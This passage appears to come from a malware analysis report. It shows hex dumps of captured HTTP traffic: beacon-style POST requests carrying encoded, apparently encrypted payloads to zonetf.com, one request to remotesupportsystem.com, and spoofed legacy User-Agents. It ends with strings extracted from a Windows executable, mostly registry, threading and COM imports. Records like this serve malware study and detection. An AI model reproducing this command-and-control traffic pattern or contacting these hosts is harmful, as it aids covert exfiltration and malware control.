0x000001e0 (00480)   686c5544 73443846 356c394f 38375873   hlUDsD8F5l9O87Xs
0x000001f0 (00496)   6858696e 59314173 77355172 6f336b39   hXinY1Asw5Qro3k9
0x00000200 (00512)   4334324b 59375771 7a376e4b 61774c53   C42KY7Wqz7nKawLS
0x00000210 (00528)   6f596345 6933646e 4864776d 6f6e4a7a   oYcEi3dnHdwmonJz
0x00000220 (00544)   35496976 704b774f 76505832 6c646170   5IivpKwOvPX2ldap
0x00000230 (00560)   6161566b 69547548 78444a31 70543725   aaVkiTuHxDJ1pT7%
0x00000240 (00576)   32427664 42384531 7a365471 7a63474a   2BvdB8E1z6TqzcGJ
0x00000250 (00592)   7137656a 31504451 62535930 44695442   q7ej1PDQbSY0DiTB
0x00000260 (00608)   6a6e4d39 38335447 46324854 6b436c38   jnM983TGF2HTkCl8
0x00000270 (00624)   6b4f6439 6b4d7233 4d526b33 47305037   kOd9kMr3MRk3G0P7
0x00000280 (00640)   71333379 35702532 4245504b 30535478   q33y5p%2BEPK0STx
0x00000290 (00656)   6f253246 78722532 46764b6c 4450714c   o%2Fxr%2FvKlDPqL
0x000002a0 (00672)   39563679 464a327a 5a45695a 74333525   9V6yFJ2zZEiZt35%
0x000002b0 (00688)   32424377 6e77365a 33617242 50677967   2BCwnw6Z3arBPgyg
0x000002c0 (00704)   624b4a56 486c6378 786d5a35 6552486f   bKJVHlcxxmZ5eRHo
0x000002d0 (00720)   735a2048 5454502f 312e300d 0a436f6e   sZ HTTP/1.0..Con
0x000002e0 (00736)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000002f0 (00752)   486f7374 3a207265 6d6f7465 73757070   Host: remotesupp
0x00000300 (00768)   6f727473 79737465 6d2e636f 6d0d0a41   ortsystem.com..A
0x00000310 (00784)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000320 (00800)   2d416765 6e743a20 6f706572 612f382e   -Agent: opera/8.
0x00000330 (00816)   31310d0a 0d0a                         11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a0d 0a0d0a33 20202077 7149386a   .......3   wqI8j
0x00000160 (00352)   5a6c6b31 4d573445 334c330a            Zlk1MW4E3L3.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7731 4b763937 35586c6d   X%2BSNw1Kv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a6f4b67 66526539   ose......oKgfRe9
0x00000160 (00352)   39553152 7a636d6f 7475726e 4f335376   9U1RzcmoturnO3Sv
0x00000170 (00368)   25324649 30454766 7276616f 41673144   %2FI0EGfrvaoAg1D
0x00000180 (00384)   6a597349 66473849 4d786c57 48563748   jYsIfG8IMxlWHV7H
0x00000190 (00400)   66523631 5241614b 336e6a37 38504453   fR61RAaK3nj78PDS
0x000001a0 (00416)   54796478 70636c55 584b7157 64577933   TydxpclUXKqWdWy3
0x000001b0 (00432)   4d574d63 43426958 62544f70 6d7a7546   MWMcCBiXbTOpmzuF
0x000001c0 (00448)   57543758 36595746 77386b31 56776350   WT7X6YWFw8k1VwcP
0x000001d0 (00464)   25324646 6545764d 48504238 43366d56   %2FFeEvMHPB8C6mV
0x000001e0 (00480)   686c5544 73443846 356c394f 38375873   hlUDsD8F5l9O87Xs
0x000001f0 (00496)   6858696e 59314173 77355172 6f336b39   hXinY1Asw5Qro3k9
0x00000200 (00512)   4334324b 59375771 7a376e4b 61774c53   C42KY7Wqz7nKawLS
0x00000210 (00528)   6f596345 6933646e 4864776d 6f6e4a7a   oYcEi3dnHdwmonJz
0x00000220 (00544)   35496976 704b774f 76505832 6c646170   5IivpKwOvPX2ldap
0x00000230 (00560)   6161566b 69547548 78444a31 70543725   aaVkiTuHxDJ1pT7%
0x00000240 (00576)   32427664 42384531 7a365471 7a63474a   2BvdB8E1z6TqzcGJ
0x00000250 (00592)   7137656a 31504451 62535930 44695442   q7ej1PDQbSY0DiTB
0x00000260 (00608)   6a6e4d39 38335447 46324854 6b436c38   jnM983TGF2HTkCl8
0x00000270 (00624)   6b4f6439 6b4d7233 4d526b33 47305037   kOd9kMr3MRk3G0P7
0x00000280 (00640)   71333379 35702532 4245504b 30535478   q33y5p%2BEPK0STx
0x00000290 (00656)   6f253246 78722532 46764b6c 4450714c   o%2Fxr%2FvKlDPqL
0x000002a0 (00672)   39563679 464a327a 5a45695a 74333525   9V6yFJ2zZEiZt35%
0x000002b0 (00688)   32424377 6e77365a 33617242 50677967   2BCwnw6Z3arBPgyg
0x000002c0 (00704)   624b4a56 486c6378 786d5a35 6552486f   bKJVHlcxxmZ5eRHo
0x000002d0 (00720)   735a2048 5454502f 312e300d 0a436f6e   sZ HTTP/1.0..Con
0x000002e0 (00736)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000002f0 (00752)   486f7374 3a207265 6d6f7465 73757070   Host: remotesupp
0x00000300 (00768)   6f727473 79737465 6d2e636f 6d0d0a41   ortsystem.com..A
0x00000310 (00784)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000320 (00800)   2d416765 6e743a20 6f706572 612f382e   -Agent: opera/8.
0x00000330 (00816)   31310d0a 0d0a                         11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a755825 3242534e 78623579 676d3143   JuX%2BSNxb5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6574662e 636f6d0d 0a557365 722d4167   etf.com..User-Ag
0x00000100 (00256)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000110 (00272)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000120 (00288)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000130 (00304)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x00000140 (00320)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000150 (00336)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000160 (00352)   0a6c6b31 4d573445 334c330a            .lk1MW4E3L3.


Strings
.
z
.
 
 G
m7
040904b0
1520
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
2~W_&f
]3iu[a
.4|}nG
6%	Gvk
6;iiIg
6[Wk:2
7m5]}8
7}[N|{
}8~e&u
 8O>]DgT<
+8+Tz~h
ADVAPI32.dll
AMGetErrorTextW
];'aW_
biDrVN
c1g	KO
ClearCommError
CloseHandle
CLSIDFromString
CoCreateInstance
CoFreeUnusedLibraries
CoInitialize
CoInitializeEx
CopyRect
CoRegisterClassObject
CoRevokeClassObject
CoTaskMemAlloc
CoTaskMemFree
CoUninitialize
CreateEventA
CreateFiberEx
CreateItemMoniker
CreateStreamOnHGlobal
CreateThread
CreateWindowExA
@">D^2
@.data
DeleteCriticalSection
DestroyWindow
D_G>9k
DispatchMessageA
Dr8xoi
EnterCriticalSection
EnumResourceNamesA
e/Q[ni
e@Y9yw^
f0Y/@i
FatalExit
;G:+4n!
GetACP
GetCurrentProcessId
GetMessageA
GetQueueStatus
GetRunningObjectTable
GetSystemTimeAsFileTime
GetVersionExA
H6nJI(
H;8>Zz
i(drUs
iG!r?C
`iic)~
InitializeCriticalSection
iuhi[1
*|^jJ5Z
jKJY\>6
JRichu
Jz@kN'
K8|4HK
KERNEL32.dll
k?*h=S
K*\lH\e
kS*}dn
K}<	vn
LeaveCriticalSection
/L-MV1^
LoadStringA
LocalFree
:~MCK<j
_->Mivm
MonitorFromWindow
MsgWaitForMultipleObjects
M=|.Tk=
n7mKwmD
nW~T$m
n^Y0Ql=N
OED3B-U
ole32.dll
PeekMessageA
PostThreadMessageA
[&qjLb
)qkuxl\+
QUARTZ.dll
%~~r6}
`.rdata
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegisterClassA
RegisterWindowMessageA
RegOpenKeyExA
RegQueryValueExA
RegSetValueA
RegSetValueExA
ResumeThread
rPa?;g
SetEvent
SHELL32.dll
SHGetSpecialFolderPathA
SPv?0I
StringFromCLSID
StringFromGUID2
t4	#mh
 T];A%U
!This program cannot be run in DOS mode.
timeBeginPeriod
timeEndPeriod
timeGetDevCaps
timeGetTime
tMi<+c
ttZ5;R
tyG-Y+
tyK{W#
USER32.dll
-v)+Bk9l
VT_	|4
WaitForSingleObject
WhJUd*
WINMM.dll
W{\L.Gf;
wsprintfA
wvsprintfA
W&y;2"
x-J8z'
[}xwJ"
xwx=lS
;xY(iY
Y7+H,6
Yk<oi2
;ywhQU
z*5`}b